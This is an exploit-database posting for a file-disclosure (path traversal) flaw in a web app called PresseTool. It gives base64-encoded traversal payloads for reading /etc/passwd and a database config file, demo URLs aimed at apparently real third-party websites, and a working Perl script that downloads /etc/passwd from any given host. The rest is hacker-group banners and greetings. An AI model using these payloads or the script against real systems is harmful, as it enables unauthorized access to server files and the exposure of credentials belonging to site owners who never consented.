PresseTool <= (/etc/passwd) Disclosure Exploit(Encoded) 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Live Contact : knockoutr@msn.com [~] E-Mail : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://exploit-id.com - http://0nto.me/ [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : PresseTool |~Price : N/A |~Version : N/A |~Software: N/A |~Vulnerability Style : /etc/passwd Disclosure |~Vulnerability Dir : / |~Google Keyword : Website by Plinka Design. |[~]Date : "23004.2011" |[~]Tested on : DEMOS ---------------------------------------------------------- filedownload.php <= 'file' Functions Not Security Disclosure file name Encode on base64 algorithm.. classes_class.database.php ENCODED BASE64 Y2xhc3Nlcy9jbGFzcy5EYXRhYmFzZS5waHA= Disclosure Attack ready --------------------------------------------------------- Demos /ETC/PASSWD Disclosure Attack.. http://www.regiocast.de/regiocast/pressetool/filedownload.php?file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== http://www.mir-media.de/pressetool/filedownload.php?file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== http://www.mach3.de/pressetool/filedownload.php?file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== OR classes_class.Database.php <= Disclosure Attack.. http://www.regiocast.de/regiocast/pressetool/filedownload.php?file=Y2xhc3Nlcy9jbGFzcy5EYXRhYmFzZS5waHA= http://www.mir-media.de/pressetool/filedownload.php?file=Y2xhc3Nlcy9jbGFzcy5EYXRhYmFzZS5waHA= http://www.mach3.de/pressetool/filedownload.php?file=Y2xhc3Nlcy9jbGFzcy5EYXRhYmFzZS5waHA= ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== DISCLOSURE.PL ================================================= use LWP::Simple; use LWP::UserAgent; system('cls'); system('title pressetool <= Remote classes_class.Database.php Disclosure Exploit'); system('color 2'); if(@ARGV < 2) { print "[-]Su Sekilde Kocum. \n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 HedefWeb /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } print "\n************************************************************************\n"; print "\* Plinka Design <= Remote (File Disclosure/LFI) Exploit *\n"; print "\* Exploited By : KnocKout *\n"; print "\* Contact : knockoutr[at]msn[dot]com *\n"; print "\* -- *\n"; print "\*********************************************************************\n\n\n"; ($TargetIP, $path, $File,) = @ARGV; $File="filedownload.php?file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=="; my $url = "http://" . $TargetIP . $path . $File; print "\n Az Bekle Sikertiyorum!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "passwd.txt"); if ($request->is_success) { print "[+] $url <= Hedef Site Exploit Edildi!\n\n"; print "[+] OPERASYON TAMAM !\n"; print "[+] etc/passwd Dosyasi Indirildi (passwd.txt)\n"; print "[+] GRAYHATZ STAR \n"; print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... \n"; exit(); } else { print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n"; exit(); } ================================================================ .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Was Here. # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....